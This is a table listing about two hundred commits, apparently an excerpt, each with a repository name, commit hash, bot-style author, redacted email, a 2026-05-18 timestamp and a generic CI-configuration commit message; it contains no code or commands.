| 376 | Wiznet/WIZ5XXSR-RP-C | 11678230c10b | ci-bot | [email protected] | 2026-05-18T16:33:10.000Z | fix: correct build workflow |
| 377 | isaac372/GestionAeropuerto | 1170a02f2091 | auto-ci | [email protected] | 2026-05-18T13:02:00.000Z | fix: correct build workflow |
| 378 | rahulbohra57/DataViz-EDA-using-AI | 118b7f8544cf | auto-ci | [email protected] | 2026-05-18T16:33:24.000Z | ci: add build optimization step |
| 379 | rahulj004/Logistic_Reggresion_with_R_programming | 1198b210ccd3 | build-bot | [email protected] | 2026-05-18T16:00:04.000Z | chore: optimize pipeline runtime |
| 380 | home1344/WebAR_frontend | 119ae32460e3 | build-bot | [email protected] | 2026-05-18T14:30:39.000Z | chore: sync ci configuration |
| 381 | dpaetsch/Impossible-Spaces-VR | 119bec2c80b9 | auto-ci | [email protected] | 2026-05-18T13:30:47.000Z | chore: optimize pipeline runtime |
| 382 | Srj-Love/DbRegistrationPHPLocal | 11a469efd9d3 | auto-ci | [email protected] | 2026-05-18T12:58:11.000Z | build: improve ci performance |
| 383 | kayosama007/ci-build-20260329-190441-9957 | 11c2a2f0d54f | ci-bot | [email protected] | 2026-05-18T14:23:41.000Z | ci: update build config |
| 384 | huyixi/Utils | 11cae88d0a2a | ci-bot | [email protected] | 2026-05-18T13:44:36.000Z | chore: optimize pipeline runtime |
| 385 | Denis10/Forecast | 11cb8980bc12 | ci-bot | [email protected] | 2026-05-18T13:56:05.000Z | ci: update build config |
| 386 | Dnevno/Rewards | 11cfce156db2 | pipeline-bot | [email protected] | 2026-05-18T16:11:57.000Z | chore: sync ci configuration |
| 387 | NikAr0702/deeplinks_testing | 11f8c7b2d15b | build-bot | [email protected] | 2026-05-18T12:11:27.000Z | ci: update build config |
| 388 | Mostakim0978/test2 | 11fa55f34df9 | ci-bot | [email protected] | 2026-05-18T11:45:29.000Z | ci: update build config |
| 389 | waheed3742/ci-pipeline-5-l19b | 11fc90d764b7 | ci-bot | [email protected] | 2026-05-18T11:45:11.000Z | fix: correct build workflow |
| 390 | Lohit-18/CNS-OBS | 1201245b51e4 | build-bot | [email protected] | 2026-05-18T13:05:04.000Z | ci: add build optimization step |
| 391 | nishchalrautela/Deep-Learning-for-Detecting-Cyberbullying-Across-Multiple-Social-Media-Platform | 12108a7466d1 | ci-bot | [email protected] | 2026-05-18T16:24:38.000Z | chore: optimize pipeline runtime |
| 392 | quattromartelli/hammerstallation | 1219ceebdd89 | auto-ci | [email protected] | 2026-05-18T12:55:52.000Z | chore: update ci/cd pipeline |
| 393 | mirfanjazuli/wedding-invitation | 121a14a04692 | ci-bot | [email protected] | 2026-05-18T16:36:47.000Z | chore: optimize pipeline runtime |
| 394 | naytanvieira/tela-login-angular | 121cab1b5fdb | pipeline-bot | [email protected] | 2026-05-18T15:13:12.000Z | chore: sync ci configuration |
| 395 | kishore-manickavel/test-action-1779110816930485104 | 122282d6379c | build-bot | [email protected] | 2026-05-18T12:54:35.000Z | ci: update build config |
| 396 | AntonyDicio/api_clima | 122c6580adf8 | build-bot | [email protected] | 2026-05-18T12:07:37.000Z | ci: update build config |
| 397 | nnfuad/nnfuad | 122c6a60b4a0 | ci-bot | [email protected] | 2026-05-18T13:20:29.000Z | chore: optimize pipeline runtime |
| 398 | myssaqil/List-data-flutter-and-get-to-listview | 1247706928ec | auto-ci | [email protected] | 2026-05-18T14:17:01.000Z | ci: add build optimization step |
| 399 | alexmagwe/sema | 125180ac3fce | build-bot | [email protected] | 2026-05-18T13:03:20.000Z | ci: add build optimization step |
| 400 | Dyybyy/debaa | 1251e7be08c4 | ci-bot | [email protected] | 2026-05-18T13:26:50.000Z | ci: update build config |
| 401 | AmarKumarShaw/input--tasks | 125451880572 | pipeline-bot | [email protected] | 2026-05-18T12:13:27.000Z | chore: optimize pipeline runtime |
| 402 | EcoBin-System/EcoBin-Admin | 125e67333e03 | pipeline-bot | [email protected] | 2026-05-18T14:05:47.000Z | chore: update ci/cd pipeline |
| 403 | RobertLlb/crypto_monitor | 127615a546d8 | build-bot | [email protected] | 2026-05-18T14:32:59.000Z | chore: sync ci configuration |
| 404 | jakhadakash/selenium | 1282e889c316 | build-bot | [email protected] | 2026-05-18T14:58:05.000Z | chore: update ci/cd pipeline |
| 405 | deploy11/aq | 12917279732c | auto-ci | [email protected] | 2026-05-18T11:50:32.000Z | ci: update build config |
| 406 | musatekin/DVC | 129d9ec63702 | build-bot | [email protected] | 2026-05-18T17:01:06.000Z | ci: update build config |
| 407 | zarvish/Relay | 12b7bc0aa3a8 | build-bot | [email protected] | 2026-05-18T12:19:50.000Z | chore: sync ci configuration |
| 408 | iconicvenom/PregnancyCalculatorv1 | 12bc7b245a5b | build-bot | [email protected] | 2026-05-18T15:36:12.000Z | build: improve ci performance |
| 409 | kayosama007/ci-build-20260329-190022-8944 | 12d4fd4f7e59 | pipeline-bot | [email protected] | 2026-05-18T14:24:59.000Z | chore: update ci/cd pipeline |
| 410 | dilek36/factor-analysis | 12de3805c93a | ci-bot | [email protected] | 2026-05-18T13:08:10.000Z | ci: add build optimization step |
| 411 | AmarKumarShaw/coreflex_assignment2-3_typescript | 12ece1fca68f | build-bot | [email protected] | 2026-05-18T12:17:36.000Z | chore: sync ci configuration |
| 412 | saradune6/MCP-Learning | 12f17a148f03 | pipeline-bot | [email protected] | 2026-05-18T12:59:46.000Z | fix: correct build workflow |
| 413 | WIZnet-ioNIC/WIZnet-PICO-C | 12f1e4bc5536 | ci-bot | [email protected] | 2026-05-18T16:12:43.000Z | chore: optimize pipeline runtime |
| 414 | liquorice-byte/icyharvest-1.21.1-NeoForge | 1308ff710e6e | auto-ci | [email protected] | 2026-05-18T13:07:12.000Z | ci: add build optimization step |
| 415 | moroccovid/covid140 | 130bcbc238a1 | build-bot | [email protected] | 2026-05-18T13:10:05.000Z | ci: add build optimization step |
| 416 | Princ3k/revless-web | 13203f2f4c2b | ci-bot | [email protected] | 2026-05-18T13:54:01.000Z | build: improve ci performance |
| 417 | JustinHahn8902/WhiteBoxTesting | 132d5c65f604 | auto-ci | [email protected] | 2026-05-18T16:12:02.000Z | build: improve ci performance |
| 418 | Shirley940613/Shirley940615.Github.io | 133686e9092d | auto-ci | [email protected] | 2026-05-18T13:56:47.000Z | ci: add build optimization step |
| 419 | AmarKumarShaw/react-practice-small-problems | 1355a8ae1bc1 | build-bot | [email protected] | 2026-05-18T12:11:11.000Z | build: improve ci performance |
| 420 | Kongkambyy/CodeCraft | 135f175cf33c | pipeline-bot | [email protected] | 2026-05-18T12:33:49.000Z | fix: correct build workflow |
| 421 | AsulProject/AsulPackage | 1367d71a1fbc | pipeline-bot | [email protected] | 2026-05-18T12:41:31.000Z | chore: update ci/cd pipeline |
| 422 | Ibex-Technologies-Promotion-PLC/production-control-system | 136939daa74d | auto-ci | [email protected] | 2026-05-18T15:45:24.000Z | chore: update ci/cd pipeline |
| 423 | b1kaf7/Role-Playing-Game | 136eaac1aeff | build-bot | [email protected] | 2026-05-18T15:27:44.000Z | chore: sync ci configuration |
| 424 | developer-ayan/wasgibstduu | 1371c7979194 | auto-ci | [email protected] | 2026-05-18T13:18:54.000Z | ci: add build optimization step |
| 425 | sahidDev09/web-warriors | 137d9205a4d1 | ci-bot | [email protected] | 2026-05-18T16:08:21.000Z | chore: optimize pipeline runtime |
| 426 | dremzki/python | 1392a6be1525 | ci-bot | [email protected] | 2026-05-18T12:28:37.000Z | chore: update ci/cd pipeline |
| 427 | ZachMourtada/Wavebreaker | 139724b9a8c2 | build-bot | [email protected] | 2026-05-18T16:22:51.000Z | fix: correct build workflow |
| 428 | saradune6/Insurance_model | 139873c4b40b | build-bot | [email protected] | 2026-05-18T12:59:07.000Z | build: improve ci performance |
| 429 | pranto2051/Full-React-Corce-in-One-Repository | 139b25f69317 | build-bot | [email protected] | 2026-05-18T14:12:14.000Z | fix: correct build workflow |
| 430 | ankitnagar34/Tic-Tac-Toe-Game | 13a1c8fb1dd1 | auto-ci | [email protected] | 2026-05-18T16:15:21.000Z | chore: update ci/cd pipeline |
| 431 | thebenmerlin/Todo-Frontend | 13bbb9ea9929 | auto-ci | [email protected] | 2026-05-18T12:19:47.000Z | chore: update ci/cd pipeline |
| 432 | jenish-prog/traffic_flow_optimizer | 13d7bc3ae802 | pipeline-bot | [email protected] | 2026-05-18T14:10:35.000Z | chore: optimize pipeline runtime |
| 433 | wiegerw/nerva | 13fb529b8363 | ci-bot | [email protected] | 2026-05-18T12:33:21.000Z | chore: update ci/cd pipeline |
| 434 | riomukhtarom/aplikasi-flutter | 142bf7b1cc07 | ci-bot | [email protected] | 2026-05-18T15:42:40.000Z | build: improve ci performance |
| 435 | kritikhatri/ai-image-generator | 1435bba24b44 | pipeline-bot | [email protected] | 2026-05-18T15:35:30.000Z | chore: optimize pipeline runtime |
| 436 | tuantrinitri/COPPA-VN | 14543636b8fd | build-bot | [email protected] | 2026-05-18T16:46:33.000Z | build: improve ci performance |
| 437 | noullove/tdevmon | 145555f8c389 | pipeline-bot | [email protected] | 2026-05-18T12:34:48.000Z | ci: add build optimization step |
| 438 | yashlad27/PythonDSA | 145f298aee03 | build-bot | [email protected] | 2026-05-18T13:26:49.000Z | chore: update ci/cd pipeline |
| 439 | kritikhatri/rock-paperr-scissors | 1465f0681956 | ci-bot | [email protected] | 2026-05-18T15:35:12.000Z | fix: correct build workflow |
| 440 | jenna-studio/cotton-candy-editor | 14722e167228 | pipeline-bot | [email protected] | 2026-05-18T12:24:58.000Z | fix: correct build workflow |
| 441 | aurore017/student-finance-tracker | 1472e128827a | pipeline-bot | [email protected] | 2026-05-18T13:28:28.000Z | chore: update ci/cd pipeline |
| 442 | kalimora/YouGen | 148d1a410657 | auto-ci | [email protected] | 2026-05-18T16:04:51.000Z | fix: correct build workflow |
| 443 | anibeladjei/Movie-Maze | 14926a2aeb5d | build-bot | [email protected] | 2026-05-18T13:41:27.000Z | chore: sync ci configuration |
| 444 | josepquintana/A-Proyecto | 1496b633b38f | pipeline-bot | [email protected] | 2026-05-18T12:10:03.000Z | chore: update ci/cd pipeline |
| 445 | bbarreto96/test-action-1778997996736796043 | 14a4df7491b2 | auto-ci | [email protected] | 2026-05-18T16:42:20.000Z | build: improve ci performance |
| 446 | edrichard/learnSymfony2 | 14a5ccb11a77 | ci-bot | [email protected] | 2026-05-18T16:24:20.000Z | fix: correct build workflow |
| 447 | HamzaElMkhantar/algorithm_and_dataStructure-problems | 14b9efed91c8 | build-bot | [email protected] | 2026-05-18T17:16:29.000Z | chore: update ci/cd pipeline |
| 448 | huyparody/scrollview-demo | 1501956d6fa0 | pipeline-bot | [email protected] | 2026-05-18T14:17:34.000Z | ci: update build config |
| 449 | salvadorC03/flightbookingsystem | 15033fbd2564 | auto-ci | [email protected] | 2026-05-18T11:40:04.000Z | ci: add build optimization step |
| 450 | thebenmerlin/UIDAI | 150769cc5c9f | build-bot | [email protected] | 2026-05-18T12:17:55.000Z | ci: update build config |
| 451 | jenish-prog/image_panel | 150e3e9e0826 | pipeline-bot | [email protected] | 2026-05-18T14:09:33.000Z | chore: sync ci configuration |
| 452 | codehalic/workshop-flux-pattern-presentation | 15189e98399f | pipeline-bot | [email protected] | 2026-05-18T12:53:35.000Z | build: improve ci performance |
| 453 | vrct07/instagram-login-recreact | 151ff1a82746 | ci-bot | [email protected] | 2026-05-18T14:26:03.000Z | chore: sync ci configuration |
| 454 | umairabhatti786/Buzz | 1521099df843 | pipeline-bot | [email protected] | 2026-05-18T13:04:33.000Z | chore: sync ci configuration |
| 455 | Davidf2004/DFonsecaCoinSphere. | 1527870e9882 | build-bot | [email protected] | 2026-05-18T17:09:27.000Z | ci: update build config |
| 456 | Sh1ptoast/Janney_Senate_2025 | 153453d318b5 | ci-bot | [email protected] | 2026-05-18T15:27:49.000Z | chore: update ci/cd pipeline |
| 457 | duanpf/utils | 153a3b7a96c3 | auto-ci | [email protected] | 2026-05-18T13:05:16.000Z | chore: optimize pipeline runtime |
| 458 | leosouliotis/conv1dsparse | 15444253b3a3 | ci-bot | [email protected] | 2026-05-18T15:43:50.000Z | fix: correct build workflow |
| 459 | jongsun-park/portfolio-client | 154676e2d088 | pipeline-bot | [email protected] | 2026-05-18T16:22:25.000Z | ci: update build config |
| 460 | ChandrakanthSabnekar/test-action-ab94b76ac079 | 154b2d170945 | pipeline-bot | [email protected] | 2026-05-18T13:51:25.000Z | chore: update ci/cd pipeline |
| 461 | diavanda/vable-app | 154ccf5db71c | build-bot | [email protected] | 2026-05-18T12:35:56.000Z | ci: update build config |
| 462 | Michkath12/meteo | 1564669a5516 | pipeline-bot | [email protected] | 2026-05-18T17:07:49.000Z | fix: correct build workflow |
| 463 | ankitkumar572005/test-action-1779100876471577656 | 15750945caf4 | build-bot | [email protected] | 2026-05-18T16:37:46.000Z | fix: correct build workflow |
| 464 | kayosama007/ci-build-0043 | 157abd1a85fe | pipeline-bot | [email protected] | 2026-05-18T14:26:32.000Z | ci: add build optimization step |
| 465 | ShayanHasanKhan0/PointOfSale | 15845a6fcdb0 | build-bot | [email protected] | 2026-05-18T16:52:37.000Z | fix: correct build workflow |
| 466 | musatekin/continuous-integration | 159c1d9a8a7a | ci-bot | [email protected] | 2026-05-18T17:02:26.000Z | ci: add build optimization step |
| 467 | nebink/R-projects | 15d08825a85b | auto-ci | [email protected] | 2026-05-18T12:16:55.000Z | fix: correct build workflow |
| 468 | AmarKumarShaw/amar-kumar-shaw-portfolio | 15d9b80abbd2 | auto-ci | [email protected] | 2026-05-18T12:09:21.000Z | chore: optimize pipeline runtime |
| 469 | roydellclarke/connectie | 15dee2edc404 | pipeline-bot | [email protected] | 2026-05-18T13:04:00.000Z | fix: correct build workflow |
| 470 | ShaileshS237/demoGit | 15f1f003b40c | auto-ci | [email protected] | 2026-05-18T16:53:50.000Z | ci: update build config |
| 471 | rahulbohra57/rahulbohra57 | 15faf69efbb7 | pipeline-bot | [email protected] | 2026-05-18T16:30:49.000Z | chore: sync ci configuration |
| 472 | Taha-khaled1/animal_dashboard_Flutter_app | 16176a79ebc8 | auto-ci | [email protected] | 2026-05-18T14:59:53.000Z | chore: update ci/cd pipeline |
| 473 | Viraj1635/quizz_app | 164048d85403 | pipeline-bot | [email protected] | 2026-05-18T12:09:56.000Z | chore: update ci/cd pipeline |
| 474 | MR-AYAN-CHOWDHURY/netlify-feature-Anthony | 1646ee6dee7a | pipeline-bot | [email protected] | 2026-05-18T11:42:08.000Z | fix: correct build workflow |
| 475 | zeroshotlabs/pharango | 165086c15568 | build-bot | [email protected] | 2026-05-18T13:33:45.000Z | chore: sync ci configuration |
| 476 | jongsun-park/CCT-BDS-P | 1657ccd174ea | ci-bot | [email protected] | 2026-05-18T16:15:59.000Z | fix: correct build workflow |
| 477 | TECHIES-V1/TheTutor | 16592b1116c9 | ci-bot | [email protected] | 2026-05-18T17:20:09.000Z | chore: optimize pipeline runtime |
| 478 | Asultop/asultop.github.io | 166eb6f053c0 | pipeline-bot | [email protected] | 2026-05-18T12:41:07.000Z | ci: update build config |
| 479 | alva-intelligence/obsidian-lark-wiki-sync | 16819f998d56 | ci-bot | [email protected] | 2026-05-18T14:07:03.000Z | build: improve ci performance |
| 480 | git-init-priyanshu/GO-MnogoDB | 168f6c8ab6e9 | ci-bot | [email protected] | 2026-05-18T17:05:16.000Z | ci: add build optimization step |
| 481 | EnamulBokshi/ML-Foundation | 16980784eaf7 | pipeline-bot | [email protected] | 2026-05-18T15:30:50.000Z | ci: update build config |
| 482 | RachidyB/Car_Rental | 169b2a52702e | ci-bot | [email protected] | 2026-05-18T17:33:40.000Z | chore: update ci/cd pipeline |
| 483 | SaiDheeraj-19/GrandLine-AI | 16b20d2ec2de | ci-bot | [email protected] | 2026-05-18T15:46:04.000Z | chore: update ci/cd pipeline |
| 484 | varunvaghasiya11/Java_script_Bhagvad-GIta | 16b4f5170a84 | build-bot | [email protected] | 2026-05-18T13:58:54.000Z | ci: update build config |
| 485 | TonyTeam/TechRealTime | 16bc2f2d2bbb | auto-ci | [email protected] | 2026-05-18T12:46:15.000Z | chore: sync ci configuration |
| 486 | David-Irihose/Currency_Converter | 16c726bb7f20 | pipeline-bot | [email protected] | 2026-05-18T13:27:28.000Z | build: improve ci performance |
| 487 | Sbongslany/employeemanagerapp | 16d1f9b83856 | pipeline-bot | [email protected] | 2026-05-18T16:30:39.000Z | chore: update ci/cd pipeline |
| 488 | gokul-227/data-retention-offloader | 16d25a47e31d | ci-bot | [email protected] | 2026-05-18T16:19:10.000Z | ci: add build optimization step |
| 489 | varunvaghasiya11/Java_script_OOP_Project | 16dba3ff19cd | ci-bot | [email protected] | 2026-05-18T13:59:42.000Z | ci: add build optimization step |
| 490 | Debbatisudheer/Adam-Optimisation | 16f77eab208a | pipeline-bot | [email protected] | 2026-05-18T17:34:34.000Z | ci: update build config |
| 491 | Rajesh0055/CRM_frontend | 17001751c900 | ci-bot | [email protected] | 2026-05-18T13:38:07.000Z | chore: update ci/cd pipeline |
| 492 | azimsidd/MultimodulePractise | 1700c6aa84f3 | pipeline-bot | [email protected] | 2026-05-18T13:20:01.000Z | fix: correct build workflow |
| 493 | aligilan/mench | 17080f442726 | auto-ci | [email protected] | 2026-05-18T16:09:30.000Z | chore: sync ci configuration |
| 494 | mwinterstorm/catbot_red | 171c56e7b395 | pipeline-bot | [email protected] | 2026-05-18T13:11:03.000Z | chore: update ci/cd pipeline |
| 495 | balajipachai/basketcoin-sc | 173f4be12b9c | pipeline-bot | [email protected] | 2026-05-18T12:34:21.000Z | chore: sync ci configuration |
| 496 | huyixi/line-style.huyixi.com | 174d00b4e965 | auto-ci | [email protected] | 2026-05-18T13:43:00.000Z | ci: add build optimization step |
| 497 | Bekir-Caglar/grafik-gantt | 17577424fd40 | build-bot | [email protected] | 2026-05-18T13:12:56.000Z | chore: sync ci configuration |
| 498 | umairabhatti786/Jabburr | 17618ded33ee | ci-bot | [email protected] | 2026-05-18T13:08:01.000Z | chore: optimize pipeline runtime |
| 499 | cjustinobi/frontend-in-2hours | 1767180d2bab | build-bot | [email protected] | 2026-05-18T13:50:10.000Z | ci: add build optimization step |
| 500 | 0-pavand/TaskMate | 1774a65f7617 | build-bot | [email protected] | 2026-05-18T12:57:14.000Z | chore: optimize pipeline runtime |
| 501 | VrajPatelK/node-pgsql-apis | 17aa429eee05 | ci-bot | [email protected] | 2026-05-18T12:45:17.000Z | fix: correct build workflow |
| 502 | kaanakboga/Adaptive-PCG-Platformer | 17b56c3d5a77 | build-bot | [email protected] | 2026-05-18T13:33:11.000Z | chore: update ci/cd pipeline |
| 503 | Liz1610/analizador | 17c774169956 | build-bot | [email protected] | 2026-05-18T12:09:45.000Z | fix: correct build workflow |
| 504 | myssaqil/Dia-Sudah-Hilang | 17dd686ee201 | build-bot | [email protected] | 2026-05-18T14:14:27.000Z | build: improve ci performance |
| 505 | atb9210/langchain-ai-agent | 17ea6e08db77 | ci-bot | [email protected] | 2026-05-18T13:52:07.000Z | ci: update build config |
| 506 | leytomfernando-droid/REGISTRO-USUARIO | 17ed21b2867c | build-bot | [email protected] | 2026-05-18T17:01:56.000Z | build: improve ci performance |
| 507 | Xenonidium/test-action-1779116808615647248 | 17f279f7ac61 | build-bot | [email protected] | 2026-05-18T12:41:37.000Z | build: improve ci performance |
| 508 | fms-repo/ibizhr | 17f2d710a010 | auto-ci | [email protected] | 2026-05-18T15:48:00.000Z | ci: add build optimization step |
| 509 | ConnectSiteForge/docs-91aep3 | 17f716f90829 | ci-bot | [email protected] | 2026-05-18T14:36:31.000Z | fix: correct build workflow |
| 510 | gowtham-32112/DSA-start | 17fcf6560838 | ci-bot | [email protected] | 2026-05-18T12:57:00.000Z | chore: update ci/cd pipeline |
| 511 | dark733/ProjectParkour | 1812c6b50d0e | build-bot | [email protected] | 2026-05-18T14:03:35.000Z | ci: add build optimization step |
| 512 | mashirolang/taskflow | 181388bb8f4e | ci-bot | [email protected] | 2026-05-18T12:15:33.000Z | fix: correct build workflow |
| 513 | kingjamesegun/Frontend-Application | 1817421486cf | pipeline-bot | [email protected] | 2026-05-18T12:18:35.000Z | build: improve ci performance |
| 514 | fadexadex/neetcode-submissions-ey19t1gr | 18186a2f27f4 | pipeline-bot | [email protected] | 2026-05-18T17:20:29.000Z | build: improve ci performance |
| 515 | yashlad27/LC-PS | 18188da0c84c | pipeline-bot | [email protected] | 2026-05-18T13:29:47.000Z | chore: sync ci configuration |
| 516 | Jacopogr/SneakerSpot | 18231471ae53 | auto-ci | [email protected] | 2026-05-18T14:00:36.000Z | chore: sync ci configuration |
| 517 | praktikum-java/sorting-hill-reference | 182463e19c0d | build-bot | [email protected] | 2026-05-18T13:49:15.000Z | chore: sync ci configuration |
| 518 | danderson-stack/xai-chatbot | 1837703255af | build-bot | [email protected] | 2026-05-18T12:24:28.000Z | ci: add build optimization step |
| 519 | Richonn/Richonn | 1839436e6c22 | build-bot | [email protected] | 2026-05-18T14:03:22.000Z | chore: optimize pipeline runtime |
| 520 | arj1211/FileCrypto | 183e92a2f744 | build-bot | [email protected] | 2026-05-18T15:41:37.000Z | chore: sync ci configuration |
| 521 | BienG3Rd/homepage | 1840da01f825 | pipeline-bot | [email protected] | 2026-05-18T16:25:04.000Z | ci: add build optimization step |
| 522 | RobertLlb/Aplicacao_Web_FullStacks | 1842ea85403c | build-bot | [email protected] | 2026-05-18T14:31:53.000Z | chore: sync ci configuration |
| 523 | mwasalat/one_mobility_turmet_react | 184b545cde21 | pipeline-bot | [email protected] | 2026-05-18T15:11:39.000Z | ci: update build config |
| 524 | SuyeongUeno/python_day2 | 18582b35d803 | build-bot | [email protected] | 2026-05-18T17:11:35.000Z | ci: add build optimization step |
| 525 | NITHIN-NT/test-action-1778960691951302987 | 187107beae88 | ci-bot | [email protected] | 2026-05-18T13:19:47.000Z | chore: optimize pipeline runtime |
| 526 | umairabhatti786/Status25 | 187b772c0b00 | pipeline-bot | [email protected] | 2026-05-18T12:58:34.000Z | build: improve ci performance |
| 527 | leosouliotis/masterschool_test | 1887873cfcda | pipeline-bot | [email protected] | 2026-05-18T15:40:47.000Z | build: improve ci performance |
| 528 | khurll/hellogit | 1894189bbeb0 | ci-bot | [email protected] | 2026-05-18T12:49:51.000Z | chore: update ci/cd pipeline |
| 529 | SanketVerse/chatbot_rag | 1894c3347558 | build-bot | [email protected] | 2026-05-18T17:20:52.000Z | fix: correct build workflow |
| 530 | jenish-prog/my_project_hi | 189889cba47a | auto-ci | [email protected] | 2026-05-18T14:06:13.000Z | chore: optimize pipeline runtime |
| 531 | deploy11/deploy11 | 18a3e4d3754d | auto-ci | [email protected] | 2026-05-18T11:48:45.000Z | fix: correct build workflow |
| 532 | persian-tools/py-persian-tools | 18aa49e5f42c | pipeline-bot | [email protected] | 2026-05-18T12:52:55.000Z | chore: optimize pipeline runtime |
| 533 | HarshAgnihotri9/test-action-1778957958789717972 | 18b7627809ed | build-bot | [email protected] | 2026-05-18T12:10:42.000Z | ci: add build optimization step |
| 534 | b1kaf7/Traffic-Light-Simulation | 18c305bcede3 | build-bot | [email protected] | 2026-05-18T15:29:15.000Z | ci: update build config |
| 535 | lucky-hw-kim/tinyapp | 18cdd4ece6ad | auto-ci | [email protected] | 2026-05-18T12:44:14.000Z | build: improve ci performance |
| 536 | Akisan98/NgRx-Demo | 18d4d4c4398b | build-bot | [email protected] | 2026-05-18T14:04:04.000Z | fix: correct build workflow |
| 537 | nuketuna1101/TowerDefenseTCP-UnityClient | 18ec697f9787 | pipeline-bot | [email protected] | 2026-05-18T12:00:33.000Z | ci: update build config |
| 538 | maheskumar-as/sumanas-auth0 | 18f7463bda2f | auto-ci | [email protected] | 2026-05-18T13:32:15.000Z | chore: optimize pipeline runtime |
| 539 | jdg0812/hello_doraemon | 1913b1269c49 | build-bot | [email protected] | 2026-05-18T16:45:26.000Z | build: improve ci performance |
| 540 | bishaldahal4777/todo-best | 191757537973 | build-bot | [email protected] | 2026-05-18T13:29:46.000Z | chore: sync ci configuration |
| 541 | hawaripro/shorten | 191b5986300c | auto-ci | [email protected] | 2026-05-18T13:46:42.000Z | chore: update ci/cd pipeline |
| 542 | aswsub/ioia | 194150e58865 | auto-ci | [email protected] | 2026-05-18T12:55:39.000Z | fix: correct build workflow |
| 543 | chicoluan/Daily-Journal | 194640c97c44 | pipeline-bot | [email protected] | 2026-05-18T12:44:43.000Z | fix: correct build workflow |
| 544 | jongsun-park/Spark-The-Definitive-Guide | 1954663be9b2 | build-bot | [email protected] | 2026-05-18T16:16:17.000Z | fix: correct build workflow |
| 545 | c0der0jal/ACHS-80117747 | 1958c7edc008 | auto-ci | [email protected] | 2026-05-18T12:54:58.000Z | chore: optimize pipeline runtime |
| 546 | MoustafaElsaghier/ImagePicker | 19675d03f38d | ci-bot | [email protected] | 2026-05-18T15:33:53.000Z | chore: update ci/cd pipeline |
| 547 | 0xdps/railway-secret | 196d44f9c209 | ci-bot | [email protected] | 2026-05-18T13:57:43.000Z | ci: add build optimization step |
| 548 | 0xdps/easybank-website | 197a5f4eb973 | build-bot | [email protected] | 2026-05-18T14:02:34.000Z | ci: add build optimization step |
| 549 | usUpal/upals-meditation-tracker | 197d5f80082d | ci-bot | [email protected] | 2026-05-18T12:19:01.000Z | fix: correct build workflow |
| 550 | vichuer/vichuer | 1989771e80af | ci-bot | [email protected] | 2026-05-18T12:52:04.000Z | build: improve ci performance |
| 551 | ayushrudani/FarmerAssistance | 198ee3c1c9ba | auto-ci | [email protected] | 2026-05-18T12:11:52.000Z | chore: update ci/cd pipeline |
| 552 | anibeladjei/PayFlow | 1996c2dee6f5 | build-bot | [email protected] | 2026-05-18T13:41:10.000Z | build: improve ci performance |
| 553 | henryalouf/orion-chat | 19a1ae097cfd | ci-bot | [email protected] | 2026-05-18T15:10:35.000Z | ci: add build optimization step |
| 554 | Dejlof/Amos-Adebisi-Elev8-HTML-CSS | 19a1ee89d8cc | ci-bot | [email protected] | 2026-05-18T16:01:39.000Z | fix: correct build workflow |
| 555 | RameshRukshan/Simulatator-ProBigD | 19a656ee942a | ci-bot | [email protected] | 2026-05-18T17:42:21.000Z | ci: update build config |
| 556 | andrewillian/AssandoSites | 19ff95bf3bad | build-bot | [email protected] | 2026-05-18T16:21:19.000Z | build: improve ci performance |
| 557 | ankitkumar572005/Smart-Traffic-System | 1a02ccf3dba6 | ci-bot | [email protected] | 2026-05-18T16:42:52.000Z | ci: update build config |
| 558 | Don-Antonio18/info2180-lab2 | 1a088b587531 | build-bot | [email protected] | 2026-05-18T15:36:58.000Z | chore: optimize pipeline runtime |
| 559 | isaac372/Pelectronica | 1a090f1219ec | build-bot | [email protected] | 2026-05-18T13:03:45.000Z | chore: update ci/cd pipeline |
| 560 | make-it-simple-rayshar/chrome-extensions | 1a098f604c51 | build-bot | [email protected] | 2026-05-18T12:21:28.000Z | ci: add build optimization step |
| 561 | git-init-priyanshu/Go-CRUD | 1a135937fa9a | auto-ci | [email protected] | 2026-05-18T17:06:53.000Z | chore: optimize pipeline runtime |
| 562 | rahulbohra57/mall-billing-system | 1a208d7be34e | auto-ci | [email protected] | 2026-05-18T16:32:21.000Z | ci: add build optimization step |
| 563 | mk016/Gendaphool | 1a2ad5675eaf | auto-ci | [email protected] | 2026-05-18T16:43:43.000Z | ci: add build optimization step |
| 564 | JKS-sys/FLAMES-game-storing-in-localStorage | 1a39098f1afb | ci-bot | [email protected] | 2026-05-18T14:21:29.000Z | fix: correct build workflow |
| 565 | ErezD1/test-action-1778963955249150920 | 1a3e8a683046 | auto-ci | [email protected] | 2026-05-18T12:26:12.000Z | build: improve ci performance |
| 566 | codedecode25/SpringBoot_CRUD_CustomExceptionHandling | 1a58e24bcf6b | pipeline-bot | [email protected] | 2026-05-18T17:29:07.000Z | build: improve ci performance |
| 567 | andersonphiri/jsonmockserver | 1a5e6c108ee9 | ci-bot | [email protected] | 2026-05-18T13:58:46.000Z | chore: optimize pipeline runtime |
| 568 | Sh1ptoast/My-Simple-Projects | 1a64e8f64754 | pipeline-bot | [email protected] | 2026-05-18T15:27:44.000Z | chore: sync ci configuration |
| 569 | HonggNa/test-action-1779119164941011700 | 1a658ae27131 | pipeline-bot | [email protected] | 2026-05-18T13:40:25.000Z | ci: update build config |
| 570 | Asultop/Re-AsulCFGManager | 1a66dd15ba3a | ci-bot | [email protected] | 2026-05-18T12:26:35.000Z | build: improve ci performance |
| 571 | pranto2051/Online-voting-system-University-project | 1a6710468cc3 | pipeline-bot | [email protected] | 2026-05-18T14:14:09.000Z | chore: sync ci configuration |
| 572 | EnamulBokshi/Shop-Java-ULM | 1a7ba404910d | pipeline-bot | [email protected] | 2026-05-18T15:35:51.000Z | chore: sync ci configuration |
| 573 | HarshAgnihotri9/TheNoidaFlats | 1a7cc55623ce | auto-ci | [email protected] | 2026-05-18T12:14:40.000Z | chore: optimize pipeline runtime |
| 574 | sahidDev09/Chat-application-server | 1a85502ccc8c | auto-ci | [email protected] | 2026-05-18T16:07:18.000Z | ci: add build optimization step |
| 575 | SaiDheeraj-19/Kairo | 1a9db3b83116 | auto-ci | [email protected] | 2026-05-18T15:45:21.000Z | fix: correct build workflow |
| 576 | naytanvieira/login-screen | 1aa6cbd82669 | ci-bot | [email protected] | 2026-05-18T15:13:36.000Z | build: improve ci performance |
| 577 | thebenmerlin/thebenmerlin | 1aab3a4b79ce | pipeline-bot | [email protected] | 2026-05-18T12:17:25.000Z | chore: sync ci configuration |
| 578 | jaff0040/AdventureCo.Website- | 1ac96346d5e8 | ci-bot | [email protected] | 2026-05-18T17:38:48.000Z | chore: update ci/cd pipeline |
| 579 | Gigih1996/animal-sound-game | 1acdafdb259c | pipeline-bot | [email protected] | 2026-05-18T17:38:38.000Z | chore: optimize pipeline runtime |
